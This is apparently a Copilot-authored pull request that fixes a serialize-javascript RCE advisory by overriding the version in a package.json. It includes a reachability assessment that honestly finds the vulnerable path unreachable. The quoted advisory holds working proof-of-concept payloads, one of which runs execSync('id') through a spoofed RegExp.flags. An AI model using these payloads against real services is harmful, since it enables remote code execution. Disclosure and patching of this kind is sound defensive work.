fix: upgrade serialize-javascript to 7.0.3 (GHSA-5c6j-r48x-rmvq)

[Copilot]

serialize-javascript ≤7.0.2 allows RCE via spoofed RegExp.flags or Date.prototype.toISOString() — an incomplete fix for CVE-2020-7660. The vulnerable package enters via mocha@11.7.5, which pins serialize-javascript ^6.0.2.

Changes

• .github/scripts/package.json — adds overrides to force serialize-javascript to 7.0.3, since mocha's own peer constraint blocks the automatic upgrade:

  "overrides": {
    "serialize-javascript": "7.0.3"
  }

• .github/scripts/package-lock.json — regenerated; node_modules/serialize-javascript now resolves to 7.0.3.

Reachability

serialize-javascript is not called by any application code — only used internally by mocha's test worker. The vulnerable API (attacker-controlled RegExp/Date with spoofed properties passed to serialize()) is never reachable from this codebase. Update addresses scanner findings rather than an active exploit path. Confidence: high.

Original prompt

---

This section details the Dependabot vulnerability alert you should resolve

<alert_title>Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()</alert_title>
<alert_description>### Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
#h2. PoC 2: Code Injection via Date.toISOString()

const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
#h2. PoC 3: Remote Code Execution

const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3</alert_description>

high
GHSA-5c6j-r48x-rmvq
serialize-javascript
npm
<vulnerable_versions>6.0.2</vulnerable_versions>
<patched_version>7.0.3</patched_version>
<manifest_path>.github/scripts/package-lock.json</manifest_path>

https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq https://nvd.nist.gov/vuln/detail/CVE-2020-7660 https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9 https://github.com/advisories/GHSA-hxcc-f52p-wc94 https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3 https://github.com/advisories/GHSA-5c6j-r48x-rmvq

<task_instructions>Resolve this alert by updating the affected package to a non-vulnerable version. Prefer the lowest non-vulnerable version (see the patched_version field above) over the latest to minimize breaking changes. Include a Reachability Assessment section in the PR description. Review the alert_description field to understand which APIs, features, or configurations are affected, then search the codebase for usage of those specific items. If the vulnerable code path is reachable, explain how (which files, APIs, or call sites use the affected functionality) and note that the codebase is actively exposed to this vulnerability. If the vulnerable code path is not reachable, explain why (e.g. the affected API is never called, the vulnerable configuration is not used) and note that the update is primarily to satisfy vulnerability scanners rather than to address an active risk. If the advisory is too vague to determine reachability (e.g. 'improper input validation' with no specific API named), state that reachability could not be determined and explain why. Include a confidence level in the reachability assessment (e.g. high confidence if the advisory names a specific API and you confirmed it is or is not called, low confidence if the usage is indirect and hard to trace). If no patched version is available, check the alert_description field for a Workarounds section — the advisory may describe configuration changes or usage pa...

• Resolves github/request-marketplace-action alert Bump mocha from 10.1.0 to 10.2.0 in /.github/scripts #39

[github-actions]

=============================== Coverage summary ===============================
Statements   : 0% ( 0/46 )
Branches     : 0% ( 0/20 )
Functions    : 0% ( 0/6 )
Lines        : 0% ( 0/46 )
================================================================================